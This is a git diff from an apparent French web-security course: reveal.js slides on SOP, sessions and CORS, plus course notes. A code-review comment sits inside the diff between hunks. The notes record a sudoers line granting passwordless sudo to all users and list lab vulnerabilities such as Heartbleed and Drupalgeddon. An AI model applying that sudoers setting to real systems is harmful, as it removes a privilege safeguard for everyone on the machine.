injection & confidentialitĂ© + + +## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) + +le client ajoute automatiquement une en-tĂȘte HTTP + +```http +Origin: http://www.foo.com +``` + +le serveur doit ajouter une en tĂȘte HTTP d'autorisation pour le domaine + +```http +Access-Control-Allow-Origin: http://www.foo.com +``` + +en-tĂȘte d'autorisation pour tous les domaines + +```http +Access-Control-Allow-Origin: * +``` + + +## [<i class="fa fa-medkit"></i> **CORS** Cross Origin Resource 
Sharing](https://developer.mozilla.org/fr/docs/HTTP/Access_control_CORS) + +* autorise tous les verbes HTTP + * [JSONP](http://igm.univ-mlv.fr/~dr/XPOSE2009/ajax_sop_jsonp/jsonp_presentation.html) n'autorisait que la mĂ©thode GET + + * [<i class="fab fa-stack-overflow"></i> Disable firefox same origin policy](http://stackoverflow.com/questions/17088609/disable-firefox-same-origin-policy) + +Note: +- l'introduction de cette nouvelle possibilitĂ© implique nĂ©cessairement que les serveurs doivent gĂ©rer de nouvelles entĂȘtes, et doivent renvoyer les ressources avec de nouvelles entĂȘtes Ă©galement +- doit ĂȘtre supportĂ© par le navigateur +- la valeur * est possible mais risquĂ©e +- requĂȘtes simples, prĂ©-vĂ©rifiĂ©es avec le verbe OPTIONS, avec habilitations en forcant l'envoie du cookie diff --git a/content/slides/1337/session.html b/content/slides/1337/session.html new file mode 100644 index 0000000000000000000000000000000000000000..0a85358a12c181c60b796530d3dfc3c06e723257 --- /dev/null +++ b/content/slides/1337/session.html 
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>Session</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/session.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/1337/sop.html b/content/slides/1337/sop.html
new file mode 100644
index 0000000000000000000000000000000000000000..8c0f65938d4b3d80a1dda593bd14bc3cab2683d6
--- /dev/null
+++ b/content/slides/1337/sop.html
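Review bot: `ele.className = 'fragment';` in the markdown plugin callback overwrites every class already present on the `<li>` rather than adding one; `ele.classList.add('fragment');` keeps whatever the plugin or the author's markup put there. The neighbouring lines are also loosely written: `var fragIndex = ele.innerHTML.indexOf("--")` lacks a terminating semicolon, `if (fragIndex != -1){` uses loose equality where `!==` is meant, and `Array.prototype.forEach.call(document.querySelectorAll(...), fn)` can simply be `document.querySelectorAll('section > li').forEach(fn)`. The same callback is repeated verbatim in the sop.html hunk, and the two pages otherwise differ only in their title and `data-markdown` path, so a shared helper would keep the copies from drifting apart.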
@@ -0,0 +1,71 @@
+<!doctype html>
+<html>
+ <head>
+ <meta charset="utf-8">
+ <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+
+ <title>SOP</title>
+
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/reveal.css">
+ <link rel="stylesheet" href="../../node_modules/reveal.js/css/theme/black.css">
+
+ <!-- Theme used for syntax highlighting of code -->
+ <link rel="stylesheet" href="../../node_modules/reveal.js/lib/css/zenburn.css">
+ <link rel="stylesheet" href="../../node_modules/@fortawesome/fontawesome-free/css/all.min.css">
+ <link rel="stylesheet" href="../main.css">
+
+ <!-- Printing and PDF exports -->
+ <script>
+ var link = document.createElement( 'link' );
+ link.rel = 'stylesheet';
+ link.type = 'text/css';
+ link.href = window.location.search.match( /print-pdf/gi ) ? '../../node_modules/reveal.js/css/print/pdf.css' : '../../node_modules/reveal.js/css/print/paper.css';
+ document.getElementsByTagName( 'head' )[0].appendChild( link );
+ </script>
+ </head>
+ <body>
+ <div class="reveal">
+ <div class="slides">
+ <section data-markdown="md/sop.md"
+ data-separator="^\n\n\n"
+ data-separator-vertical="^\n\n"
+ data-separator-notes="^Note:"
+ data-charset="utf-8">
+ </section>
+ </div>
+ </div>
+
+ <!-- script src="../../node_modules/reveal.js/lib/js/head.min.js"></script -->
+ <script src="../../node_modules/reveal.js/js/reveal.js"></script>
+
+ <script>
+ // More info about config & dependencies:
+ // - https://github.com/hakimel/reveal.js#configuration
+ // - https://github.com/hakimel/reveal.js#dependencies
+ Reveal.initialize({
+ controls: true,
+ progress: true,
+ history: true,
+ center: false,
+ dependencies: [
+ { src: '../../node_modules/reveal.js/plugin/markdown/marked.js' },
+ { src: '../../node_modules/reveal.js/plugin/markdown/markdown.js',
+ condition: function() { return !!document.querySelector( '[data-markdown]' ); },
+ callback: function() {
Array.prototype.forEach.call(document.querySelectorAll('section > li'), function(ele){
+ var fragIndex = ele.innerHTML.indexOf("--")
+ if (fragIndex != -1){
+ ele.innerHTML = ele.innerHTML.replace("--", "");
+ ele.className = 'fragment';
+ }
+ });
+ }
+ },
+ { src: '../../node_modules/reveal.js/plugin/notes/notes.js', async: true },
+ { src: '../../node_modules/reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } }
+ ]
+ });
+ </script>
+ <script src="../main.js"></script>
+ </body>
+</html>
diff --git a/content/slides/main.css b/content/slides/main.css
index b7f8cb421d1272cd1340dfade07bcc336ca111d4..f7370428ec7de3efdacbd92539639c6fbe6f6c13 100644
--- a/content/slides/main.css
+++ b/content/slides/main.css
@@ -75,4 +75,12 @@ reveal code {
 .fa-book-skull,
 .fa-screwdriver-wrench {
 color: grey;
+}
+
+code:not([class]) {
+ background-color: darkgrey;
+ border-radius: 5px;
+ padding: 5px;
+ font-size: 80%;
+ color: white;
 }
\ No newline at end of file
diff --git a/notes.md b/notes.md
index f6e0c929fae3a217ebbb528a4e57f2d82e37bbd3..fb839634391f02f03effa045448797dd366090f1 100644
--- a/notes.md
+++ b/notes.md
@@ -5,8 +5,7 @@
 * faire le challenge DVWA CSP aprĂšs XSS ajouter SOP et CORS => virer ou vider Browser
 * faire le challenge captcha aprĂšs CSRF
 * reprendre le code du gist dans http et dans CSP pour faire des fetch dignes
-* reprendre la doc pour faire fonctionner kali avec les vieilles Vms avec virtualBox 7
- * Heartbleed / ShellShock / Drupalgeddon
+ * faire relire js Ă @tibertra & @thlecoub
 ## sudo vi /etc/sudoers
 -> %sudo ALL=(ALL:ALL) ALL
 -> %sudo ALL=(ALL) NOPASSWD:ALL